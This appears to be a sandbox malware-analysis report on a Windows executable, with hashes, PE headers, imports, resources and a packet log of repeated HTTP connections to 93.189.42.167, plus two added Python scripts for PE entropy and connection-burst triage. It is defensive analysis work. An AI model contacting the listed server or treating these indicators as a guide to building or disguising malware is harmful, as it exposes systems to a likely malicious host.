  SHA1: 33E6AF1234407B8B26FD75643CE2E9A0E94948EF
  SHA-256: EE26950F8539C166BB61C27B24CE62EB70A9AF98E6256470BECFA13B56AC4248
  SHA-512: F5EF0ECB503B9DAD19EDAAB4DD1B1982CF29343B214CFED9E7CA966CC83B29CD8D4B1CE33C0EED8F4005870D2DCE33E469131D76E5CFA3882C55C9ACB10F6388
  Malicious: false
  Reputation: unknown
                                                                                                                                                                                                            Preview: regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmz@~r................................................................................................................................................................................................................................................................................................................................................$.u/HvLE.N......U.............mj....T_.N...................`... ..hbin................p.\..,..........nk,...r.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...r........ ........................... .......Z.......................Root........lf......Root....nk ...r.....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...
                                                                                                                                                                                                            \Device\ConDrv
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3773
                                                                                                                                                                                                            Entropy (8bit):4.7109073551842435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                                            MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                                            SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                                            SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                                            SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.09851739034015
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 0Cjy7Lkv1A.exe
File size: 284672
MD5: eb023c854d3c8a24589e9294fd5d346e
SHA1: 699eb8e25fcd583774381b9ff554c7e8442c8c43
SHA256: b602afd3f94c5820291f8319b23f20e5254212ba6aab49be0238d7067caca7b8
SHA512: 9d20183622a2ba8e59fd6fc3f8f361da2c258d040ede68844ed65303e3ee1aaa5b4df1c6a2af13a1a0162faab9c23c4577963ef4b5f2601ae8516d26b0e96b17
SSDEEP: 3072:AbxI6T6jY7wdRLjumseo44+9acMUpK5XVFR5+zcXXGO1Z6S9daWrxpzbgqru:AbxRx4d8XVFn7W6/muzbgwu
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................g.......q.I.....v......h..........E.....x.......f.......c.....Rich....................PE..L......_...........

File Icon

Icon Hash: a4fc36b6b694c6e2

Static PE Info

General

Entrypoint: 0x403410
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x5F8E9300 [Tue Oct 20 07:34:24 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 6d4af36ccbaddaffd179ef41d42df9cf

Entrypoint Preview

Instruction
call 00007F61210D6FE7h
jmp 00007F61210D0F9Dh
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F61210D1146h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F61210D1170h
test ecx, 00000003h
jne 00007F61210D1111h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F61210D110Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F61210D1154h
test ah, ah
je 00007F61210D1146h
test eax, 00FF0000h
je 00007F61210D1135h
test eax, FF000000h
je 00007F61210D1124h
jmp 00007F61210D10EFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 004142D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F61210D112Eh
test byte ptr [eax], 00000008h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [LNK] VS2008 build 21022
• [ASM] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17668 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x41000 | 0xcd20 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x141d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x16940 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x14000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12223 | 0x12400 | False | 0.611488655822 | data | 6.67194983583 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x14000 | 0x3f32 | 0x4000 | False | 0.366027832031 | data | 5.43383883533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x18000 | 0x28178 | 0x22200 | False | 0.252253605769 | data | 2.7902507697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x41000 | 0xcd20 | 0xce00 | False | 0.65973907767 | data | 6.33812987137 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
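The Data Directories and Sections tables above are the output of a PE header walk. The script below is an added example, not part of the Joe Sandbox report and not its code, that performs that walk on a constructed minimal PE32 (the analysed sample's bytes are not on the page, so build_sample_pe() fabricates a two-section image for illustration) and reproduces the columns that matter for triage: virtual and raw sizes, decoded section characteristics, Shannon entropy of each section's raw bytes, and the "Is in Section" mapping of every data directory RVA. The 7.0 entropy threshold and the writable-plus-executable check are this example's own heuristics, not something the report states.

```python
import math
import struct

# Section characteristic bits (winnt.h); these are the names in the Characteristics column
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def rva_to_section(sections: list, rva: int) -> str:
    """The 'Is in Section' column: name of the section whose virtual range contains the RVA."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return ""


def parse_pe32(image: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20                                   # IMAGE_FILE_HEADER is 20 bytes
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    sections = []
    for i in range(nsect):                            # 40-byte IMAGE_SECTION_HEADERs follow the optional header
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        entropy = shannon_entropy(image[rawptr:rawptr + rawsize])
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": rawsize, "entropy": entropy,
            "flags": [n for bit, n in SECTION_FLAGS.items() if chars & bit],
            # Heuristics of this example: W+X sections and near-uniform bytes are common packer tells
            "writable_and_executable": bool(chars & 0x80000000 and chars & 0x20000000),
            "high_entropy": entropy > 7.0,
        })
    # PE32 optional header: NumberOfRvaAndSizes at +92, IMAGE_DATA_DIRECTORY[16] at +96
    n_dirs = struct.unpack_from("<I", image, opt + 92)[0]
    directories = []
    for i in range(min(n_dirs, 16)):
        va, size = struct.unpack_from("<II", image, opt + 96 + 8 * i)
        directories.append({"name": DIRECTORY_NAMES[i], "va": va, "size": size,
                            "section": rva_to_section(sections, va) if va else ""})
    return {"sections": sections, "directories": directories}


def build_sample_pe() -> bytes:
    """Constructed test input: a minimal, non-runnable PE32 with two sections (not the report's sample)."""
    text_raw = bytes(range(256)) * 2                  # every byte value twice -> entropy exactly 8.0
    data_raw = b"A" * 512                             # a single byte value -> entropy 0.0
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew at 0x3C -> PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)  # i386, 2 sections, 224-byte optional hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 92, 16)               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x2010, 0x28)   # IMPORT directory, inside .data
    struct.pack_into("<II", opt, 96 + 8 * 12, 0x2000, 0x10)  # IAT directory, inside .data
    rx = 0x00000020 | 0x20000000 | 0x40000000
    rw = 0x00000040 | 0x40000000 | 0x80000000
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x1E0, 0x1000, 0x200, 0x200, 0, 0, 0, 0, rx)
    sect += struct.pack("<8sIIIIIIHHI", b".data", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, rw)
    image = bytearray(0x600)
    image[0:0x40] = dos
    image[0x40:0x44] = b"PE\0\0"
    image[0x44:0x58] = coff
    image[0x58:0x138] = opt
    image[0x138:0x188] = sect
    image[0x200:0x400] = text_raw
    image[0x400:0x600] = data_raw
    return bytes(image)


if __name__ == "__main__":
    for s in parse_pe32(build_sample_pe())["sections"]:
        print(s["name"], hex(s["va"]), f'{s["entropy"]:.2f}', s["writable_and_executable"], s["flags"])
```

Entropy is a rule of thumb rather than a verdict: the report's .text scores 6.67 and .rsrc 6.34, both under the 7.0 cut-off used here, and compressed icon or resource data pushes a benign .rsrc up as well. The columns this parser produces are the starting point for deciding whether to unpack, not proof of packing on their own.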

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x4d088 | 0x130 | data | Bulgarian | Bulgaria
RT_ICON | 0x41570 | 0xea8 | data | Bulgarian | Bulgaria
RT_ICON | 0x42418 | 0x8a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x42cc0 | 0x6c8 | data | Bulgarian | Bulgaria
RT_ICON | 0x43388 | 0x568 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_ICON | 0x438f0 | 0x25a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x45e98 | 0x10a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x46f40 | 0x988 | data | Bulgarian | Bulgaria
RT_ICON | 0x478c8 | 0x468 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_ICON | 0x47da8 | 0xea8 | data | Bulgarian | Bulgaria
RT_ICON | 0x48c50 | 0x8a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x494f8 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | Bulgarian | Bulgaria
RT_ICON | 0x4baa0 | 0x10a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x4cb48 | 0x468 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_DIALOG | 0x4d388 | 0x72 | data | Bulgarian | Bulgaria
RT_STRING | 0x4d400 | 0x452 | data | Bulgarian | Bulgaria
RT_STRING | 0x4d858 | 0x1ec | data | Bulgarian | Bulgaria
RT_STRING | 0x4da48 | 0x2d4 | data | Bulgarian | Bulgaria
RT_ACCELERATOR | 0x4d000 | 0x60 | data | Bulgarian | Bulgaria
RT_ACCELERATOR | 0x4d060 | 0x28 | data | Bulgarian | Bulgaria
RT_GROUP_CURSOR | 0x4d1b8 | 0x14 | data | Bulgarian | Bulgaria
RT_GROUP_ICON | 0x47d30 | 0x76 | data | Bulgarian | Bulgaria
RT_GROUP_ICON | 0x4cfb0 | 0x4c | data | Bulgarian | Bulgaria
RT_VERSION | 0x4d1d0 | 0x1b8 | COM executable for DOS | Bulgarian | Bulgaria

Imports

DLL | Import
KERNEL32.dll | GetConsoleAliasesLengthW, GetLocaleInfoA, SetComputerNameExA, VirtualQuery, GetDefaultCommConfigW, FindResourceExW, OpenJobObjectA, GetConsoleAliasA, InterlockedDecrement, CompareFileTime, GetProfileSectionA, GetConsoleAliasesA, GetConsoleTitleA, ReadConsoleW, SetFileTime, GlobalAlloc, Sleep, GetFileAttributesW, GetAtomNameW, SetConsoleTitleA, RaiseException, GetLastError, GetProcAddress, GetLongPathNameA, VirtualAlloc, PrepareTape, DnsHostnameToComputerNameA, GetFileType, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, GetStringTypeW, GetVersionExA, ReadConsoleInputW, EnumSystemLocalesW, CreateThread, HeapAlloc, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

Version Infos

Description | Data
ProjectVersion | 3.10.70.57
InternationalName | bomgvioci.iwa
Copyright | Copyrighz (C) 2021, fudkort
Translation | 0x0129 0x0794

Possible Origin

Language of compilation system | Country where language is spoken
Bulgarian | Bulgaria

This origin guess is taken from the language and country IDs carried by the binary's resources (Bulgarian/Bulgaria on every row of the Resources table above). Those IDs are set by whoever built the resource section and can be given any value, so on their own they are a weak attribution signal.

Network Behavior

Network Port Distribution
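The port-distribution chart in the report is not reproduced in this text rendering. The script below is an added example, not part of the Joe Sandbox report, that recomputes the distribution and a per-connection summary from thirteen rows transcribed from the TCP Packets table that follows (same column order as the table, tab-separated here). It keys flows on the guest's ephemeral port, so each HTTP connection to 93.189.42.167:80 becomes one flow, and then flags servers that receive several connections in quick succession from consecutive client ports, which is the shape this capture shows. LOCAL_PREFIX, the 5 s window and the 3-flow minimum of burst_connections are assumptions of this example, not values from the report.

```python
from collections import Counter, defaultdict
from datetime import datetime

LOCAL_PREFIX = "192.168."   # assumption: the sandbox guest in this report is 192.168.2.6

# Rows transcribed from the report's TCP Packets table (the page renders the columns fused);
# order is timestamp, source port, dest port, source IP, dest IP.
SAMPLE_ROWS = """\
Jan 13, 2022 23:29:09.700728893 CET\t49757\t80\t192.168.2.6\t93.189.42.167
Jan 13, 2022 23:29:09.751893997 CET\t80\t49757\t93.189.42.167\t192.168.2.6
Jan 13, 2022 23:29:09.832021952 CET\t49757\t80\t192.168.2.6\t93.189.42.167
Jan 13, 2022 23:29:09.883764029 CET\t80\t49757\t93.189.42.167\t192.168.2.6
Jan 13, 2022 23:29:10.132188082 CET\t49758\t80\t192.168.2.6\t93.189.42.167
Jan 13, 2022 23:29:10.184010983 CET\t80\t49758\t93.189.42.167\t192.168.2.6
Jan 13, 2022 23:29:10.319272041 CET\t80\t49758\t93.189.42.167\t192.168.2.6
Jan 13, 2022 23:29:10.566634893 CET\t49759\t80\t192.168.2.6\t93.189.42.167
Jan 13, 2022 23:29:10.617369890 CET\t80\t49759\t93.189.42.167\t192.168.2.6
Jan 13, 2022 23:29:10.727956057 CET\t49760\t80\t192.168.2.6\t93.189.42.167
Jan 13, 2022 23:29:10.780221939 CET\t80\t49760\t93.189.42.167\t192.168.2.6
Jan 13, 2022 23:29:11.180980921 CET\t49761\t80\t192.168.2.6\t93.189.42.167
Jan 13, 2022 23:29:11.231817007 CET\t80\t49761\t93.189.42.167\t192.168.2.6
"""


def parse_row(line: str) -> dict:
    """One table row -> packet dict; the report's nanosecond stamps are cut to microseconds."""
    ts, sport, dport, sip, dip = line.split("\t")
    stamp = ts.rsplit(" ", 1)[0]                 # drop the "CET" zone marker
    stamp = stamp[: stamp.index(".") + 7]        # strptime's %f accepts at most 6 digits
    return {"when": datetime.strptime(stamp, "%b %d, %Y %H:%M:%S.%f"),
            "sport": int(sport), "dport": int(dport), "sip": sip, "dip": dip}


def summarize(table: str) -> dict:
    """Group packets into flows keyed by the guest's ephemeral port; count flows per server port."""
    flows = {}
    for line in table.strip().splitlines():
        p = parse_row(line)
        outbound = p["sip"].startswith(LOCAL_PREFIX)
        # (client, client_port, server, server_port) identifies one connection in either direction
        key = ((p["sip"], p["sport"], p["dip"], p["dport"]) if outbound
               else (p["dip"], p["dport"], p["sip"], p["sport"]))
        f = flows.setdefault(key, {"client": key[0], "client_port": key[1], "server": key[2],
                                   "server_port": key[3], "first": p["when"], "last": p["when"],
                                   "packets_out": 0, "packets_in": 0})
        f["packets_out" if outbound else "packets_in"] += 1
        f["first"], f["last"] = min(f["first"], p["when"]), max(f["last"], p["when"])
    ordered = sorted(flows.values(), key=lambda f: f["first"])
    # The report's "Network Port Distribution": how many connections went to each server port
    return {"flows": ordered, "port_distribution": dict(Counter(f["server_port"] for f in ordered))}


def burst_connections(flows: list, window_s: float = 5.0, min_flows: int = 3) -> list:
    """Servers that got >= min_flows connections whose start times all fall within window_s."""
    by_server = defaultdict(list)
    for f in flows:
        by_server[(f["server"], f["server_port"])].append(f)
    bursts = []
    for (host, port), group in by_server.items():
        starts = sorted(f["first"] for f in group)
        span = (starts[-1] - starts[0]).total_seconds()
        if len(group) >= min_flows and span <= window_s:
            ports = sorted(f["client_port"] for f in group)
            bursts.append({"host": host, "port": port, "flows": len(group), "span_s": span,
                           # sequential ephemeral ports = one process opening sockets back to back
                           "consecutive_client_ports": all(b - a == 1 for a, b in zip(ports, ports[1:]))})
    return bursts


if __name__ == "__main__":
    s = summarize(SAMPLE_ROWS)
    print("port distribution:", s["port_distribution"])
    for f in s["flows"]:
        print(f'{f["client"]}:{f["client_port"]} -> {f["server"]}:{f["server_port"]} '
              f'out={f["packets_out"]} in={f["packets_in"]} {(f["last"] - f["first"]).total_seconds():.3f}s')
    print("bursts:", burst_connections(s["flows"]))
```

Packet timing alone does not separate a loader fetching components from a page loading several sub-resources; the verdict comes from the HTTP payloads on port 80, and the window and threshold are tuning knobs rather than a signature. The summary is still useful for scoping: it tells you which server and which client ports to pull from the capture.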

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2022 23:29:09.700728893 CET | 49757 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:09.751893997 CET | 80 | 49757 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:09.752464056 CET | 49757 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:09.752650976 CET | 49757 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:09.752722025 CET | 49757 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:09.803678989 CET | 80 | 49757 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:09.831883907 CET | 80 | 49757 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:09.831932068 CET | 80 | 49757 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:09.832021952 CET | 49757 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:09.832983017 CET | 49757 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:09.883764029 CET | 80 | 49757 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.132188082 CET | 49758 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.184010983 CET | 80 | 49758 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.184151888 CET | 49758 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.184447050 CET | 49758 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.184628963 CET | 49758 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.236144066 CET | 80 | 49758 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.236186981 CET | 80 | 49758 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.267343044 CET | 80 | 49758 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.267443895 CET | 49758 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.267524958 CET | 49758 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.319272041 CET | 80 | 49758 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.566634893 CET | 49759 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.617369890 CET | 80 | 49759 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.617489100 CET | 49759 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.617583990 CET | 49759 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.617592096 CET | 49759 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.667978048 CET | 80 | 49759 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.700390100 CET | 80 | 49759 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.700601101 CET | 49759 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.700886011 CET | 49759 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.727956057 CET | 49760 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.751260996 CET | 80 | 49759 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.780221939 CET | 80 | 49760 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.780467033 CET | 49760 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.780556917 CET | 49760 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.780582905 CET | 49760 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.832581043 CET | 80 | 49760 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.859749079 CET | 80 | 49760 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:10.859872103 CET | 49760 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.860147953 CET | 49760 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:10.912049055 CET | 80 | 49760 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:11.180980921 CET | 49761 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:11.231817007 CET | 80 | 49761 | 93.189.42.167 | 192.168.2.6
Jan 13, 2022 23:29:11.231981039 CET | 49761 | 80 | 192.168.2.6 | 93.189.42.167
Jan 13, 2022 23:29:11.232136011 CET | 49761 | 80 | 192.168.2.6 | 93.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.232738972 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.282712936 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.283221960 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.336328983 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.336402893 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.336802006 CET4976180192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.365504026 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.387439966 CET804976193.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.416001081 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.416177034 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.416275024 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.417011023 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.466563940 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.467245102 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.521066904 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.521214008 CET4976280192.168.2.693.189.42.167
